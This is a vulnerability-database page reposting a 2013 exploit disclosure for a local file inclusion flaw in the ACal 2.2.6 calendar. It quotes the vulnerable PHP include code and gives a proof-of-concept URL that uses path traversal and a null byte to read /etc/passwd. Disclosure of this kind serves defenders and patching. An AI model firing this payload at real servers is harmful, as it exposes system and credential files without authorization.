ACal 2.2.6 Local File InclusiACal 2.2.6 Local File Inclusion Vulneberality

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1044589 漏洞类型
发布时间 2013-08-16 更新时间 2013-08-16
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2013080138
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Exploit Title: ACal 2.2.6 Local File Inclusion Vulneberality
Google Dork: -
Date: 15/08/2013
Exploit Author: ICheer_No0M - http://icheernoom.blogspot.com/
Vendor Homepage: http://acalproj.sourceforge.net/
Software Link: http://prdownloads.sourceforge.net/acalproj/ACal-2.2.6.tar.gz?download
Version: 2.2.6
Tested on: Windows 7 + PHP 5.2.6
 
 
---> Vuln Code : /embled/example/example.php
    
12. $path = "../../";
...
25. if (!isset($_GET['view'])) {
26.     include $path . 'embed/' . $view . '.php'; // <-- LFI + Nullbyte (if register_global = On)
27. }
28. else {
29.     include $path . 'embed/' . $_GET['view'] . '.php'; // <-- LFI + Nullbyte
30. }
     
---> Exploit/Proof of Concept (PoC)
  
http://localhost/calendar/embed/example/example.php?view=../../etc/passwd%00